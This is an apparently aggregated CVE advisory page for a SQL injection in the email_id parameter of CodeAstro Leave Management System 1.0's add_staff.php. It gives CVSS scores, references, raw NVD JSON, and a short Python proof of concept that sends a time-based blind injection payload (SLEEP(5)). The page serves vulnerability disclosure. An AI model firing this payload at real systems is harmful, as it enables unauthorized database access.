CVE-2026-9542

Description

A weakness has been identified in CodeAstro Leave Management System 1.0. The affected element is an unknown function of the file /admin/add_staff.php. Executing a manipulation of the argument email_id can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

CodeAstro Leave Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests def check_sqli(target_url, email_payload): """ Proof of Concept for CVE-2026-9542 Tests the 'email_id' parameter in /admin/add_staff.php for SQL Injection. """ target_endpoint = f"{target_url}/admin/add_staff.php" # Payload to check for time-based blind SQL injection # Assuming MySQL backend, sleep for 5 seconds if injection is successful payload = "[email protected]' AND (SELECT SLEEP(5))-- -" # Data to be sent in the POST request data = { "email_id": payload } try: print(f"[+] Sending payload to {target_endpoint}...") response = requests.post(target_endpoint, data=data, timeout=10) # Check if the response time indicates a successful delay if response.elapsed.total_seconds() >= 5: print("[!] Vulnerability confirmed: Server response delayed (SQL Injection).") else: print("[-] Vulnerability not detected or payload incorrect.") except requests.RequestException as e: print(f"[Error] Request failed: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://localhost" check_sqli(target, "")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9542
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9542
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9542/
[4] VulDB https://vuldb.com/cve/CVE-2026-9542
[5] https://codeastro.com/
[6] https://github.com/wangchaoxing/CVE/issues/8
[7] https://vuldb.com/submit/814866
[8] https://vuldb.com/vuln/365603
[9] https://vuldb.com/vuln/365603/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9542", "sourceIdentifier": "[email protected]", "published": "2026-05-26T14:16:46.173", "lastModified": "2026-05-26T19:54:40.357", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in CodeAstro Leave Management System 1.0. The affected element is an unknown function of the file /admin/add_staff.php. Executing a manipulation of the argument email_id can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]"}, {"url": "https://github.com/wangchaoxing/CVE/issues/8", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/814866", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365603", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365603/cti", "source": "[email protected]"}]}}